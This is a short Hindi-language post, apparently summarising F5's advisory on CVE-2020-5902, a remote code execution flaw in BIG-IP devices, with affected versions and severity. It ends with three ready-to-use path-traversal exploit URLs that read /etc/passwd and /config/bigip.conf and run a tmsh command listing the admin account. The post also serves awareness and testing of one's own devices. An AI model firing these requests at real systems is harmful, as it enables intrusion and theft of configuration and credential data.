
BIG-IP F5 रिमोट कोड एक्ज़ीक्यूशन
BIG-IP F5 रिमोट कोड एक्ज़िक्यूशन
ये हमले F5 Networks द्वारा निर्मित एक बहुउद्देशीय नेटवर्किंग डिवाइस BIG-IP को लक्षित कर रहे हैं। BIG-IP डिवाइसों को ट्रैफ़िक शेपिंग सिस्टम, लोड बैलेंसर, फ़ायरवॉल, एक्सेस गेटवे, रेट लिमिटर, या SSL मिडलवेयर के रूप में कार्य करने के लिए कॉन्फ़िगर किया जा सकता है।
बुधवार को, F5 Networks ने पैच प्रकाशित किए और BIG-IP डिवाइसों में "रिमोट कोड एक्ज़िक्यूशन" भेद्यता के बारे में एक सुरक्षा सलाह जारी की।
F5 ने कहा कि CVE-2020-5902 के रूप में ट्रैक की जाने वाली यह भेद्यता हमलावरों को इंटरनेट पर सुलभ बिना पैच वाले सिस्टम पर पूर्ण नियंत्रण लेने की अनुमति दे सकती है।
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin